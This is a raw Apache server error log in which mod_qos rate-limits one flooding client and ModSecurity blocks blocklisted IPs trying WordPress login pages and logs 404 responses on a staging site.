[Tue May 26 19:54:26.727736 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9uwAAAOs
[Tue May 26 19:54:26.729749 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQaAAAAHg
[Tue May 26 19:54:26.732479 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9vAAAAQE
[Tue May 26 19:54:26.734242 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9vQAAAOg
[Tue May 26 19:54:26.737602 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9vgAAANs
[Tue May 26 19:54:26.740016 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9vwAAALw
[Tue May 26 19:54:26.761547 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9wAAAAME
[Tue May 26 19:54:26.764117 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9wQAAAP8
[Tue May 26 19:54:26.766976 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9wgAAAJo
[Tue May 26 19:54:26.873511 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9xAAAAIw
[Tue May 26 19:54:26.882037 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQaQAAACg
[Tue May 26 19:54:26.882863 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9xQAAAN8
[Tue May 26 19:54:26.882975 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9xgAAAOw
[Tue May 26 19:54:26.883521 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9xwAAAM0
[Tue May 26 19:54:26.889348 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9yAAAAIY
[Tue May 26 19:54:26.893779 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9yQAAAKk
[Tue May 26 19:54:26.914777 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ywAAAPA
[Tue May 26 19:54:26.922129 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9zAAAAOk
[Tue May 26 19:54:26.979068 2026] [security2:error] [pid 93868:tid 94219] [remote 103.166.184.148:50254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IsgABp2k"]
[Tue May 26 19:54:27.022981 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K9zwAAANA
[Tue May 26 19:54:27.030726 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K90AAAANc
[Tue May 26 19:54:27.033196 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K90QAAAM4
[Tue May 26 19:54:27.034943 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQbgAAACw
[Tue May 26 19:54:27.037549 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K90gAAALY
[Tue May 26 19:54:27.043482 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K90wAAALc
[Tue May 26 19:54:27.045432 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K91AAAAJQ
[Tue May 26 19:54:27.067154 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K91QAAAIg
[Tue May 26 19:54:27.079708 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K91gAAANY
[Tue May 26 19:54:27.138382 2026] [security2:error] [pid 86490:tid 86568] [remote 161.97.109.81:35984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9zQAA000"]
[Tue May 26 19:54:27.163452 2026] [security2:error] [pid 86490:tid 86563] [remote 74.91.224.220:56724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K91wAAxUg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:27.172488 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K92QAAALU
[Tue May 26 19:54:27.179262 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K92gAAAOA
[Tue May 26 19:54:27.183355 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K92wAAAOs
[Tue May 26 19:54:27.187030 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQbwAAAEw
[Tue May 26 19:54:27.191132 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K93AAAAQE
[Tue May 26 19:54:27.197567 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K93QAAAOg
[Tue May 26 19:54:27.197729 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K93gAAANs
[Tue May 26 19:54:27.219059 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K93wAAALw
[Tue May 26 19:54:27.230766 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K94gAAAMM
[Tue May 26 19:54:27.241947 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG0qK9k_ZUB2Vp25ItQAAAZo
[Tue May 26 19:54:27.290130 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IfgAAAdo"]
[Tue May 26 19:54:27.290787 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQNAAAAEo"]
[Tue May 26 19:54:27.294069 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGVZMwN0DpLVWo6K9OAAAAMc"]
[Tue May 26 19:54:27.294845 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGVZMwN0DpLVWo6K9JwAAAMo"]
[Tue May 26 19:54:27.295877 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQMwAAAG0"]
[Tue May 26 19:54:27.296879 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQLgAAAAs"]
[Tue May 26 19:54:27.298882 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQMgAAAF4"]
[Tue May 26 19:54:27.301139 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IdQAAAeA"]
[Tue May 26 19:54:27.312097 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IhAAAAZ8"]
[Tue May 26 19:54:27.315502 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQLQAAABk"]
[Tue May 26 19:54:27.321283 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IiwAAAdA"]
[Tue May 26 19:54:27.334519 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IigAAAfc"]
[Tue May 26 19:54:27.335139 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IkQAAAgo"]
[Tue May 26 19:54:27.339789 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IfAAAAbU"]
[Tue May 26 19:54:27.340530 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IgwAAAaA"]
[Tue May 26 19:54:27.344038 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQOQAAAAk"]
[Tue May 26 19:54:27.348428 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGVZMwN0DpLVWo6K9PQAAANg"]
[Tue May 26 19:54:27.352936 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IhgAAAd0"]
[Tue May 26 19:54:27.358880 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9iwAAAJ0"]
[Tue May 26 19:54:27.366310 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQNQAAAE0"]
[Tue May 26 19:54:27.366632 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9hgAAAQA"]
[Tue May 26 19:54:27.373907 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25InAAAAcs"]
[Tue May 26 19:54:27.380330 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IhQAAAaM"]
[Tue May 26 19:54:27.389915 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGVZMwN0DpLVWo6K9SQAAAPY"]
[Tue May 26 19:54:27.395174 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQVgAAADU"]
[Tue May 26 19:54:27.400638 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IqAAAAa8"]
[Tue May 26 19:54:27.417866 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9iQAAAPI"]
[Tue May 26 19:54:27.430274 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IpgAAAf0"]
[Tue May 26 19:54:27.444913 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9hQAAAMg"]
[Tue May 26 19:54:27.459074 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IoQAAAb8"]
[Tue May 26 19:54:27.534806 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-GAAAAM0
[Tue May 26 19:54:27.537540 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-GgAAAN0
[Tue May 26 19:54:27.550139 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtG1ZMwN0DpLVWo6K-HAAAALs
[Tue May 26 19:54:27.553319 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQjgAAAB4
[Tue May 26 19:54:27.564356 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQjwAAAFw
[Tue May 26 19:54:27.567039 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-HQAAALE
[Tue May 26 19:54:27.568861 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-HgAAANg
[Tue May 26 19:54:27.587216 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQkAAAAD8
[Tue May 26 19:54:27.599925 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-HwAAAL0
[Tue May 26 19:54:27.616508 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-IAAAAO8
[Tue May 26 19:54:27.687276 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-IgAAAJ0
[Tue May 26 19:54:27.692004 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-IwAAAPw
[Tue May 26 19:54:27.700545 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQkgAAAGk
[Tue May 26 19:54:27.701597 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQkwAAACE
[Tue May 26 19:54:27.718125 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQlAAAAEA
[Tue May 26 19:54:27.720111 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-JAAAAIU
[Tue May 26 19:54:27.720683 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-JQAAAMI
[Tue May 26 19:54:27.737720 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQlQAAAHo
[Tue May 26 19:54:27.750339 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-JgAAAKs
[Tue May 26 19:54:27.771235 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-JwAAAQA
[Tue May 26 19:54:27.836292 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-KgAAAKM
[Tue May 26 19:54:27.841421 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-LAAAALI
[Tue May 26 19:54:27.850332 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQlgAAAG8
